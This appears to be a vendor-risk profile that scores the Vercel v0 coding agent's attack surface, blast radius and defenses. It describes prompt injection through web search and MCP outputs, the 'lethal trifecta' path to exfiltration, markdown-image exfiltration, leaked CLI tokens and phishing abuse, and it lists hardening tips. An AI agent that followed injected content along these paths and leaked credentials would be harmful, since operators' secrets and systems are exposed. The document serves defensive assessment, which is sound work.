Vercel v0 Agent Security Risks

Coding Agents v0.app Humble Providers
AI RISK QUADRANT POSITION DEFENSE CONTROLS (6) ATTACK SURFACE (4.92) EXPOSED GIANTS FORTIFIED LEADERS HUMBLE PROVIDERS TIGHT OPERATORS
AIRQ Score
5.46
High
Attack Surface
4.92
Medium
Blast Radius
5.88
High
Defense Controls
6
High
About The Agent

Vercel v0 is a cloud-hosted AI coding agent that generates, executes, and deploys full-stack web applications from natural language prompts within a per-chat sandboxed environment. The agent runs as a SaaS service at v0.app, executing code in Firecracker microVMs with configurable terminal permission modes and marketplace MCP integrations. The primary risk surface centers on broad external data ingestion through web search, browser use, and bring-your-own MCP servers feeding unfiltered content into the reasoning loop, combined with default-open outbound network access and one-click deployment to production infrastructure.

About the AI Risk Quadrant

Humble Providers agents combine a moderate attack surface with a below-threshold blast radius, indicating meaningful vendor investment in containment relative to exposure. Vercel v0 lands here with an Attack Surface score of 4.92 driven by external data ingestion, MCP transport vulnerabilities, and CLI credential leaks, a Blast Radius of 5.88 shaped by default-open network egress and one-click production deployment, and Defense Controls at 6 anchored by Firecracker sandbox isolation. Operators should prioritize restricting outbound network policy and disabling the Full terminal permission mode to maintain this quadrant placement.

1 Key Risks

The most critical security risks an operator inherits when deploying this agent in its documented default configuration. Vercel v0 presents a moderate attack surface driven by broad external data ingestion and default-open egress, partially offset by Firecracker sandbox isolation and configurable terminal permission modes.

Key Input Risks
Vercel v0 ingests user text prompts, uploaded images, web search results, browser-fetched external URLs, GitHub repository contents, and MCP server tool outputs into its reasoning loop on the default configuration. Input validation is described generically as code analysis before execution, but no documented prompt-injection classifier or content-type gate filters incoming data before it reaches the model. [1][8][9]
Key Execution Risks
Vercel v0 executes bash commands, npm/pnpm/bun package installs, and generated application code inside a per-chat Firecracker microVM sandbox with configurable permission modes. The sandbox isolation layer uses well-understood Firecracker technology documented by the vendor, though no independent red-team audit of the v0-specific sandbox configuration has been published. [10][13]
Key Action Risks
On the default Auto permission mode, allowlisted read-only terminal commands execute without operator approval while writes, network operations, and shell wrappers require confirmation. The highest-blast-radius default action is one-click deployment to Vercel production infrastructure, which publishes generated code to a globally accessible URL with automatic HTTPS. [13][17]
Key Output Risks
Vercel v0 emits generated source code, rendered application previews, terminal output, and deployment artifacts without documented data-loss prevention or credential-redaction controls on agent output. The vendor acknowledges markdown image rendering as an exfiltration vector in engineering guidance, and deployed applications become publicly accessible output channels. [9][11]
Key Monitoring Risks
SOC 2 Type 2 attestation covers audit logging controls at the enterprise tier, but per-action anomaly detection, SIEM forwarding, and real-time alerting for individual agent sessions are not documented as defaults. Individual operator-level monitoring of agent actions within a chat session is the primary blind spot on the standard configuration. [9][18]

2 AIRQ Scores

The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Vercel v0 balances a moderate external-facing attack surface against meaningful sandbox isolation, landing in a risk tier where targeted hardening yields measurable improvement.

AIRQ Metrics

Vercel v0 occupies the Humble Providers quadrant with an Attack Surface of 4.92, Blast Radius of 5.88, and Defense Controls at 6, placing it just below the boundary into higher-risk quadrants.

Attack Surface and Blast Radius scale to 10, Defense Controls to 15, and the composite AIRQ score reflects defensive capability relative to exposure on a 15-point scale.

Metric Score Comments
AIRQ Score 5.46 A mid-range composite indicating that vendor-provided sandbox isolation and permission modes partially offset the agent's broad input ingestion and default-open egress posture.
Blast Radius 5.88 / 10 Network egress and deployment access are the dominant blast surfaces, reflecting default allow-all outbound traffic and one-click publish to production infrastructure.
Attack Surface 4.92 / 10 External data, tool execution, output processing, and configuration surfaces drive the score, with all three trifecta conditions met on the default configuration.
Defense Controls 6 / 15 Firecracker microVM isolation and three-tier terminal permission modes are vendor-documented, while input filtering specifics and output data-loss controls are undisclosed.

3 Attack Surface

Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. The dominant exposures for Vercel v0 are its unfiltered external data channels, full bash shell execution, and MCP transport surface where an open prototype pollution vulnerability exists.

Attack Surface Metrics

Higher scores indicate surfaces where the agent ingests or processes attacker-influenced content with fewer vendor-documented controls on the default configuration.

Each row maps an attack surface to its adjusted score and a comment summarizing the evidence that anchors the assessment.

Surface Score Comments
User Input 2 / 4 User prompts and uploaded images enter the reasoning loop through the web UI with vendor-described input validation, though no specific prompt-injection detection mechanism is documented. [8][9]
External Data 3 / 4 Web search, browser use, repository imports, and marketplace MCP integrations inject third-party-authored content into the reasoning loop without a documented content-classification gate on the default configuration. [14][15]
Memory 1 / 4 Filesystem state persists within a single chat session but resets on new chat creation, meaning no cross-session memory store, vector database, or learned-behavior accumulation carries between conversations. [10]
Reasoning 2 / 4 The composite model architecture uses a dynamic system prompt and a custom AutoFix model for error correction, with no documented operator-accessible controls over reasoning-loop behavior. [16]
Planning 2 / 4 Terminal command permission modes gate multi-step plan execution at the action layer, but planning-level autonomy controls such as step-count limits or plan-review gates are not documented. [13]
Tool Execution 3 / 4 Full bash shell access runs inside the sandbox with the default Auto mode auto-approving allowlisted commands; the Full mode bypasses all approval gates entirely. [13]
Orchestration 2 / 4 Multi-step task coordination within a single supervised chat session is the documented orchestration boundary, with no background scheduling or daemon-mode execution; a workflow webhook vulnerability allowed unauthenticated payload injection into task execution. [3][15]
Inter-Agent 3 / 4 MCP marketplace and bring-your-own servers introduce inter-agent message surfaces, and an open prototype pollution vulnerability in the AI SDK MCP transport allows malicious server metadata to corrupt the agent runtime. [4][14]
Output Processing 3 / 4 Vendor engineering guidance identifies markdown image rendering as a known exfiltration vector, and independent threat intelligence documents v0-generated output abused for credential phishing at scale. [5][6][9][11]
Configuration 3.5 / 4 CVE-2026-44479 demonstrated that the CLI non-interactive mode leaked plaintext auth tokens in suggested command output, exposable in CI/CD logs and agent session transcripts. [2]

The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Vercel v0 ingests web search results and MCP tool outputs from third-party servers, accesses operator environment variables and database credentials through marketplace integrations, and maintains default allow-all outbound network access from the sandbox.

Lethal Trifecta · Complete (3 of 3)

Vercel v0 exhibits all three of these conditions in its documented default configuration:

  • Untrusted input — Web search, browser use, repository imports, and MCP server responses deliver third-party-authored content into the prompt context. [14][15]
  • Sensitive data — Environment variables containing API keys and database credentials are accessible to sandbox code through the project configuration panel. [9][10]
  • External egress — Default sandbox network policy permits unrestricted outbound traffic, and one-click deployment publishes to globally accessible production URLs. [10][17]

4 Blast Radius

The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A compromised Vercel v0 session reaches the sandbox filesystem, unrestricted outbound network, operator credentials through brokered access, and production deployment infrastructure.

Blast Radius Metrics

Higher scores reflect broader impact from a single compromised chat session, with network and deployment access carrying the most operator-visible consequences.

Each row connects a blast radius factor to its score and the documented capability boundary that determines the damage ceiling.

Factor Score Comments
Code execution 2 / 4 Generated code and shell commands execute inside a Firecracker microVM with user-level privileges, contained within the per-chat sandbox boundary. [10]
File system access 2 / 4 The agent has full read and write access to the project filesystem within the sandbox, but filesystem state does not persist across chat sessions. [10]
Network access 3 / 4 The sandbox default network policy is allow-all outbound, with SNI-based egress firewall filtering available as an opt-in configuration for enterprise customers. [10][18]
Credential access 2 / 4 Credentials are brokered at the network layer through a secret injection proxy, giving the agent functional service access without direct exposure of plaintext secrets in the sandbox scope; an infrastructure breach via compromised OAuth tokens exposed customer environment variables. [7][12][19]
Autonomous action 2 / 4 The Auto permission mode requires operator approval for writes, network operations, and shell wrappers, limiting autonomous action to allowlisted read-only commands on the default configuration. [13]
Deployment access 3 / 4 One-click publish deploys generated applications to Vercel production infrastructure with automatic HTTPS, global CDN distribution, and zero-downtime updates. [17]

5 Defense Controls

Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Vercel v0 documents Firecracker sandbox isolation and three-tier terminal permission modes as default controls, while input filtering specifics and output data-loss prevention remain undisclosed.

Defense Controls Metrics

Higher scores indicate stronger vendor-provided safeguards on the default configuration, with the inverted scale reflecting what is in place rather than what is missing.

Each component is scored on what the vendor ships and documents for the default configuration, distinguishing between vendor-implemented and operator-managed controls.

Component Score Comments
Input Guardrails 1 / 3 The vendor describes code analysis before execution and environment variable exposure warnings, but no specific prompt-injection classifier, content-type filter, or ML-based input screening is documented. [9]
Execution Isolation 2 / 3 Per-chat Firecracker microVM isolation with per-user boundaries and credential brokering at the network layer provides a documented, architecturally specific containment boundary. [10][12]
Action Controls 1 / 3 Three terminal permission modes with configurable allowlists and denylists exist, but the Full mode disables all approval gates and marketplace MCP integrations use the Ask permission mode requiring per-call approval. [13][14]
Output Guardrails 1 / 3 Server-side versus client-side environment variable distinction and smart refactoring to move sensitive code server-side are documented, but no output redaction, DLP, or exfiltration-channel blocking is described. [9][11]
Monitoring 1 / 3 SOC 2 Type 2 attestation covers enterprise audit logging and the AI Gateway provides usage metering, but per-session anomaly detection and SIEM forwarding are not documented defaults. [9]

6 Hardening Tips

Concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize restricting sandbox egress policy and enforcing the Ask terminal permission mode to break the trifecta conditions on the default configuration.

Input Guardrails

Input guardrails intercept adversarial content before it reaches the reasoning loop.

Input Guardrails
  • Policy Require security review of all MCP server integrations before adding them to v0 workspaces, vetting OAuth scopes and data access permissions.
  • Configuration Disable browser use and web search capabilities in v0 settings for workspaces handling sensitive codebases where external content ingestion is unnecessary.
  • Engineering Deploy a prompt-injection detection proxy between the v0 agent and external data sources to classify and filter adversarial content before it enters the reasoning loop.

Execution Isolation

Execution isolation contains what a compromised agent can do on the host.

Execution Isolation
  • Policy Prohibit use of the Full terminal permission mode in team workspace policies to prevent bypass of all shell approval gates on the Tool Execution surface.
  • Configuration Configure the sandbox egress firewall to allowlist only required domains, blocking unrestricted outbound network access from the microVM environment.
  • Engineering Instrument sandbox network traffic logging to capture all outbound connections and integrate with organizational SIEM for anomaly detection on agent-initiated requests.

Action Controls

Action controls govern which tools and actions the agent can invoke autonomously.

Action Controls
  • Policy Establish a deployment approval workflow requiring human review before any v0-generated application is published to production infrastructure.
  • Configuration Switch the default terminal permission mode from Auto to Ask, requiring explicit operator approval for every terminal command including allowlisted read-only operations.
  • Engineering Integrate v0 deployment actions with a CI/CD pipeline that runs static analysis and security scanning before any generated code reaches production.

Output Guardrails

Output guardrails inspect what the agent sends to other systems and users.

Output Guardrails
  • Policy Require code review of all v0-generated applications before deployment, with particular attention to client-side environment variable exposure and embedded external URLs.
  • Configuration Enable server-side-only environment variable configuration and disable the NEXT_PUBLIC_ prefix pattern for any workspace containing sensitive credentials.
  • Engineering Build a post-generation DLP scanner that inspects v0 output for credential patterns and exfiltration payloads, reducing the Output Processing surface by blocking the markdown image exfiltration vector.

Monitoring

Monitoring captures what the agent did and surfaces anomalies for review.

Monitoring
  • Policy Require enterprise-tier access for all production v0 workspaces to enable audit logging and establish a review cadence for agent action logs.
  • Configuration Configure webhook and API callback monitoring to detect unusual integration invocation patterns from v0 sessions interacting with marketplace MCP services.
  • Engineering Forward v0 audit logs to organizational SIEM infrastructure and build detection rules for anomalous deployment frequency, unusual MCP tool invocations, and credential access patterns.

7 References

The evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7, 13]) refer to entries below, listed in citation order.

Selected Vulnerabilities

  1. CVE-2025-48985 Vercel AI SDK input validation bypass allowing filetype whitelist circumvention on file uploads (CVSS 5.3, patched in 5.0.52)
  2. CVE-2026-44479 Vercel CLI non-interactive mode leaks plaintext auth token in suggested command JSON output (CVSS 5.5, patched in 52.0.1)
  3. GHSA-9r75-g2cr-3h76 Vercel Workflow DevKit webhook creation accepted predictable user-specified tokens (CVSS 5.3, patched in 4.2.0-beta.64)
  4. MCP transport prototype pollution Open issue in Vercel AI SDK: MCP transports use raw JSON.parse and mergeObjects lacks prototype key filtering

Selected Research

  1. Malicious use of Vercel for credential phishing Cofense Intelligence documents threat actors using v0 to generate phishing sign-in pages from text prompts
  2. Okta observes v0 used to build phishing sites Okta Threat Intelligence reproduces v0 abuse for credential phishing page generation impersonating sign-in flows
  3. Vercel breach OAuth supply chain attack Trend Micro analyzes Vercel breach via compromised Context.ai OAuth tokens exposing customer environment variables
  4. Prompt injection in Vercel AI agents Security researcher demonstrates prompt injection in Vercel AI SDK agents via unvalidated user input overriding system prompt

Vendor Documentation

  1. v0 security documentation Vendor security page: threat model, code validation, env var security, SOC 2 Type 2 compliance
  2. v0 sandbox documentation Per-chat Firecracker microVM isolation, per-user boundaries, configurable egress network policy defaulting to allow-all
  3. Building secure AI agents Vercel engineering blog on prompt injection, markdown image exfiltration, credential brokering architecture
  4. Security boundaries in agentic architectures Vercel engineering blog on trust boundary separation, secret injection proxy, sandbox isolation design
  5. v0 terminal commands Three terminal permission modes (Ask, Auto default, Full) with per-command allowlist and denylist
  6. v0 MCP integrations Marketplace and bring-your-own MCP server support with OAuth and three permission modes for tool execution
  7. v0 agentic features Vendor documentation of web search, browser use, error fixing, and MCP integration capabilities

Other Sources

  1. v0 composite model family Composite model architecture with dynamic system prompt, LLM Suspense, and custom AutoFix model
  2. v0 deployments One-click publish to Vercel production with global CDN distribution and automatic HTTPS
  3. Vercel Sandbox egress firewall SNI-based egress firewall filtering with domain allowlisting and CIDR blocking for sandbox environments
  4. Vercel breached via compromised third-party AI tool Vercel breach via compromised Context.ai OAuth tokens, attacker accessed Google Workspace and customer deployment data